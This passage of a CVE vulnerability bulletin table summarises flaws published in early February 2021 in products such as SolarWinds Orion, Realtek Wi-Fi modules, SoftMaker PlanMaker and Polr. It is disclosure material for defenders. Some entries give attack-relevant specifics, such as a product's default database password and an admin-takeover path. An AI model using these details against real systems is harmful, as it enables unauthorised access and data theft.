CVE-2021-21289 MISC MISC CONFIRM MISC |
micro_focus — application_performance_management |
Persistent Cross-Site scripting vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could allow a persistent XSS attack. |
2021-02-06 |
not yet calculated |
CVE-2021-22499 CONFIRM |
micro_focus — application_performance_management |
Cross Site Request Forgery vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could be exploited by an attacker to trick users into executing actions of the attacker's choosing. |
2021-02-06 |
not yet calculated |
CVE-2021-22500 CONFIRM |
nessus — ami |
Nessus AMI versions 8.12.0 and earlier were found to either not validate, or incorrectly validate, a certificate which could allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. |
2021-02-06 |
not yet calculated |
CVE-2020-5812 MISC |
netgear — r7450_routers |
This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SOAP API endpoint, which listens on TCP port 80 by default. The issue results from the lack of proper access control. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-11559. |
2021-02-04 |
not yet calculated |
CVE-2020-27873 N/A N/A |
netgear — r7450_routers |
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from improper state tracking in the password recovery process. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-11365. |
2021-02-04 |
not yet calculated |
CVE-2020-27872 N/A N/A |
new_media — smarty |
An issue was discovered in New Media Smarty before 9.10. Passwords are stored in the database in an obfuscated format that can be easily reversed. The file data.mdb contains these obfuscated passwords in the second column. NOTE: this is unrelated to the popular Smarty template engine product. |
2021-02-05 |
not yet calculated |
CVE-2020-10375 MISC MISC |
npm — npm |
This affects all versions of package decal. The vulnerability is in the extend function. |
2021-02-04 |
not yet calculated |
CVE-2020-28450 MISC MISC MISC |
npm — npm |
This affects all versions of package decal. The vulnerability is in the set function. |
2021-02-04 |
not yet calculated |
CVE-2020-28449 MISC MISC MISC |
nvidia — geforce_experience |
NVIDIA GeForce Experience, all versions prior to 3.21, contains a vulnerability in GameStream (rxdiag.dll) where an arbitrary file deletion due to improper handling of log files may lead to denial of service. |
2021-02-05 |
not yet calculated |
CVE-2021-1072 CONFIRM |
oauth2_proxy — oauth2_proxy |
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the whitelist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a whitelist domain was configured for “.example.com”, the intention is that subdomains of example.com are allowed. Instead, “example.com” and “badexample.com” could also match. This is fixed in version 7.0.0 onwards. As a workaround, one can disable the whitelist domain feature and run separate OAuth2 Proxy instances for each subdomain. |
2021-02-02 |
not yet calculated |
CVE-2021-21291 MISC MISC CONFIRM MISC |
october — october |
An issue was discovered in October through build 471. It reactivates an old session ID (which had been invalid after a logout) once a new login occurs. NOTE: this violates the intended Auth/Manager.php authentication behavior but, admittedly, is only relevant if an old session ID is known to an attacker. |
2021-02-05 |
not yet calculated |
CVE-2021-3311 CONFIRM MISC |
opmantek — open-audit |
Opmantek Open-AudIT 4.0.1 is affected by cross-site scripting (XSS). When outputting SQL statements for debugging, a maliciously crafted query can trigger an XSS attack. This attack only succeeds if the user is already logged in to Open-AudIT before they click the malicious link. |
2021-02-05 |
not yet calculated |
CVE-2021-3333 MISC |
oppo — android_phone_with_mtk_chipset |
OPPO Android Phone with MTK chipset and Android 8.1/9/10/11 versions have an information leak vulnerability. The “adb shell getprop ro.vendor.aee.enforcing” or “adb shell getprop ro.vendor.aee.enforcing” return no. |
2021-02-06 |
not yet calculated |
CVE-2020-11836 MISC |
pdf2json — pdf2json |
Buffer overflow in pdf2json 0.69 allows local users to execute arbitrary code by converting a crafted PDF file. |
2021-02-05 |
not yet calculated |
CVE-2020-18750 CONFIRM MISC |
podman — podman |
Rootless containers run with Podman receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.0.1) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards. |
2021-02-02 |
not yet calculated |
CVE-2021-20199 MISC MISC MISC MISC |
polr — polr |
Polr is an open source URL shortener. In Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account. This vulnerability exists regardless of users' settings. If an attacker crafts a request with specific cookie headers to the /setup/finish endpoint, they may be able to obtain admin privileges on the instance. This is caused by a loose comparison (==) in SetupController that is susceptible to attack. The project has been patched to ensure that a strict comparison (===) is used to verify the setup key, and that /setup/finish verifies that no users table exists before performing any migrations or provisioning any new accounts. This is fixed in version 2.3.0. Users can patch this vulnerability without upgrading by adding abort(404) to the very first line of finishSetup in SetupController.php. |
2021-02-01 |
not yet calculated |
CVE-2021-21276 MISC MISC CONFIRM |
prestashop — opart_devis |
An Insecure Direct Object Reference (IDOR) vulnerability was found in Prestashop Opart devis < 4.0.2. Unauthenticated attackers can access any user’s invoice and delivery address by exploiting an IDOR on the delivery_address and invoice_address fields. |
2021-02-04 |
not yet calculated |
CVE-2020-16194 MISC |
psyprax — psyprax |
An issue was discovered in Psyprax before 3.2.2. The Firebird database is accessible with the default user sysdba and password masterke after installation. This allows any user to access it and read and modify the contents, including passwords. Local database files can be accessed directly as well. |
2021-02-05 |
not yet calculated |
CVE-2020-10552 MISC |
psyprax — psyprax |
An issue was discovered in Psyprax before 3.2.2. The file %PROGRAMDATA%\Psyprax32\PPScreen.ini contains a hash for the lockscreen (aka screensaver) of the application. If that entry is removed, the lockscreen is no longer displayed and the app is no longer locked. All local users are able to modify that file. |
2021-02-05 |
not yet calculated |
CVE-2020-10553 MISC |
psyprax — psyprax |
An issue was discovered in Psyprax before 3.2.2. Passwords used to encrypt the data are stored in the database in an obfuscated format, which can be easily reverted. For example, the password AAAAAAAA is stored in the database as MMMMMMMM. |
2021-02-05 |
not yet calculated |
CVE-2020-10554 MISC |
question2answer — q2a |
Question2Answer Q2A Ultimate SEO Version 1.3 is affected by cross-site scripting (XSS), which may lead to arbitrary remote code execution. |
2021-02-05 |
not yet calculated |
CVE-2021-3258 MISC MISC MISC |
realtek — rtl8195a_wi-fi_module |
The function ClientEAPOLKeyRecvd() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. |
2021-02-03 |
not yet calculated |
CVE-2020-25857 CONFIRM |
realtek — rtl8195a_wi-fi_module |
The function AES_UnWRAP() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for a memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25855 CONFIRM |
realtek — rtl8195a_wi-fi_module |
The function CheckMic() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, _rt_md5_hmac_veneer() or _rt_hmac_sha1_veneer(), resulting in a stack buffer over-read which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. |
2021-02-03 |
not yet calculated |
CVE-2020-25853 CONFIRM |
realtek — rtl8195a_wi-fi_module |
The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25856 CONFIRM |
realtek — rtl8195a_wi-fi_module |
The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, rt_arc4_crypt_veneer() or _AES_UnWRAP_veneer(), resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25854 CONFIRM |
red_hat — red_hat |
A flaw was found in the default configuration of dnsmasq, as shipped with Fedora versions prior to 31 and in all versions of Red Hat Enterprise Linux, where it listens on any interface and accepts queries from addresses outside of its local subnet. In particular, the option `local-service` is not enabled. Running dnsmasq in this manner may inadvertently make it an open resolver accessible from any address on the internet. This flaw allows an attacker to conduct a Distributed Denial of Service (DDoS) against other systems. |
2021-02-06 |
not yet calculated |
CVE-2020-14312 MISC |
redwood — report2web |
A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. |
2021-02-05 |
not yet calculated |
CVE-2021-26710 MISC |
redwood — report2web |
A frame-injection issue in the online help in Redwood Report2Web 4.3.4.5 allows remote attackers to render an external resource inside a frame via the help/Online_Help/NetHelp/default.htm turl parameter. |
2021-02-05 |
not yet calculated |
CVE-2021-26711 MISC |
softmaker — office_planmaker |
An exploitable integer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to perform arithmetic that may overflow, which can result in an undersized heap allocation. Later, when copying data from the file into this allocation, a heap-based buffer overflow will occur which can corrupt memory. These types of memory corruptions can allow for code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13579 MISC |
softmaker — office_planmaker |
A memory corruption vulnerability exists in the Excel Document SST Record 0x00fc functionality of SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13586 MISC |
softmaker — office_planmaker |
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0004 and 0x0015, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27249 MISC |
softmaker — office_planmaker |
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0003 and 0x0014, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27248 MISC |
softmaker — office_planmaker |
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0002, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27247 MISC |
softmaker — office_planmaker |
An exploitable heap-based buffer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to explicitly trust a length from a particular record type and use it to write a 16-bit null relative to a buffer allocated on the stack. Due to a lack of bounds-checking on this value, this can allow an attacker to write to memory outside of the buffer and controllably corrupt memory. This can allow an attacker to earn code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13580 MISC |
solarwinds — orion_platform |
SolarWinds Orion Platform before 2020.2.4, as used by various SolarWinds products, installs and uses a SQL Server backend, and stores database credentials to access this backend in a file readable by unprivileged users. As a result, any user having access to the filesystem can read database login details from that file, including the login name and its associated password. Then, the credentials can be used to get database owner access to the SWNetPerfMon.DB database. This gives access to the data collected by SolarWinds applications, and leads to admin access to the applications by inserting or changing authentication data stored in the Accounts table of the database. |
2021-02-03 |
not yet calculated |
CVE-2021-25275 MISC |
solarwinds — orion_platform |
The Collector Service in SolarWinds Orion Platform before 2020.2.4 uses MSMQ (Microsoft Message Queue) and doesn’t set permissions on its private queues. As a result, remote unauthenticated clients can send messages to TCP port 1801 that the Collector Service will process. Additionally, upon processing of such messages, the service deserializes them in an insecure manner, allowing remote arbitrary code execution as LocalSystem. |
2021-02-03 |
not yet calculated |
CVE-2021-25274 MISC |
solarwinds — serv-u |
In SolarWinds Serv-U before 15.2.2 Hotfix 1, there is a directory containing user profile files (that include users’ password hashes) that is world readable and writable. An unprivileged Windows user (having access to the server’s filesystem) can add an FTP user by copying a valid profile file to this directory. For example, if this profile sets up a user with a C: home directory, then the attacker obtains access to read or replace arbitrary files with LocalSystem privileges. |
2021-02-03 |
not yet calculated |
CVE-2021-25276 MISC |
sonicwall — sslvpn_sma100 |
A SQL-Injection vulnerability in the SonicWall SSLVPN SMA100 product allows a remote unauthenticated attacker to perform an SQL query to access usernames, passwords, and other session-related information. This vulnerability impacts SMA100 build version 10.x. |
2021-02-04 |
not yet calculated |
CVE-2021-20016 CONFIRM |
squaredup — squaredup |
CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboard. |
2021-02-03 |
not yet calculated |
CVE-2020-9388 CONFIRM |
tibco — ebx_web_server |
The TIBCO EBX Web Server component of TIBCO Software Inc.’s TIBCO EBX contains a vulnerability that theoretically allows a low privileged attacker with network access to execute a Stored Cross Site Scripting (XSS) attack on the affected system. Affected releases are TIBCO Software Inc.’s TIBCO EBX: versions 5.9.12 and below. |
2021-02-02 |
not yet calculated |
CVE-2021-23271 CONFIRM CONFIRM |
traccar — traccar |
Traccar is an open source GPS tracking system. In Traccar before version 4.12 there is an unquoted Windows binary path vulnerability. Only Windows versions are impacted. The attacker needs write access to the filesystem on the host machine. If the Java path includes a space, then the attacker can lift their privilege to the same as the Traccar service (system). This is fixed in version 4.12. |
2021-02-02 |
not yet calculated |
CVE-2021-21292 MISC CONFIRM MISC |
trend_micro — antivirus_for_mac_2021 |
Trend Micro Antivirus for Mac 2021 (Consumer) is vulnerable to a memory exhaustion vulnerability that could lead to disabling all the scanning functionality within the application. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability – i.e. the attacker must already have access to the target system (either legitimately or via another exploit). |
2021-02-04 |
not yet calculated |
CVE-2021-25227 N/A N/A |
trend_micro — apex_one |
An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS) and OfficeScan XG SP1 could allow an unauthenticated user to obtain information about the database server. |
2021-02-04 |
not yet calculated |
CVE-2021-25229 N/A N/A N/A |
trend_micro — apex_one |
An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS), OfficeScan XG SP1, and Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain information about hotfix history. |
2021-02-04 |
not yet calculated |
CVE-2021-25228 N/A N/A N/A N/A |
trend_micro — worry-free_business_security |
An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of settings information. |
2021-02-04 |
not yet calculated |
CVE-2021-25245 N/A N/A |
trend_micro — worry-free_business_security |
An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of configuration information. |
2021-02-04 |
not yet calculated |
CVE-2021-25244 N/A N/A |
typora — typora |
An issue was discovered in Typora 0.9.67. There is an XSS vulnerability that causes Remote Code Execution. |
2021-02-05 |
not yet calculated |
CVE-2020-18737 MISC |
video_insight — vms |
Video Insight VMS versions prior to 7.8 allow a remote attacker to execute arbitrary code with system user privileges by sending a specially crafted request. |
2021-02-05 |
not yet calculated |
CVE-2021-20623 MISC MISC |
whatsapp — whatsapp |
A missing bounds check in WhatsApp for Android prior to v2.21.1.13 and WhatsApp Business for Android prior to v2.21.1.13 could have allowed out-of-bounds read and write if a user applied specific image filters to a specially crafted image and sent the resulting image. |
2021-02-02 |
not yet calculated |
CVE-2020-1910 CONFIRM |
wordpress — wordpress |
Cross-site request forgery (CSRF) vulnerability in Name Directory 1.17.4 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. |
2021-02-05 |
not yet calculated |
CVE-2021-20652 MISC MISC |
zoho — manageengine_applications_manager |
doFilter in com.adventnet.appmanager.filter.UriCollector in Zoho ManageEngine Applications Manager through 14930 allows an authenticated SQL Injection via the resourceid parameter to showresource.do. |
2021-02-05 |
not yet calculated |
CVE-2020-35765 MISC CONFIRM |
zohocorp — manageengine_remote_access_plus |
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin – User Administration userMgmt.do?actionToCall=ShowUser screen. |
2021-02-03 |
not yet calculated |
CVE-2019-16268 MISC CONFIRM |
zulipchat — zulip_desktop |
Zulip Desktop before 5.0.0 allows attackers to perform recording via the webcam and microphone due to a missing permission request handler. |
2021-02-05 |
not yet calculated |
CVE-2020-10858 CONFIRM |
zulipchat — zulip_desktop |
Zulip Desktop before 5.0.0 improperly uses shell.openExternal and shell.openItem with untrusted content, leading to remote code execution. |
2021-02-05 |
not yet calculated |
CVE-2020-10857 CONFIRM |
zzzcms — zzzcms |
SQL Injection in ZZZCMS zzzphp 1.7.1 allows remote attackers to execute arbitrary code due to a lack of parameter filtering in inc/zzz_template.php. |
2021-02-05 |
not yet calculated |
CVE-2020-18717 MISC |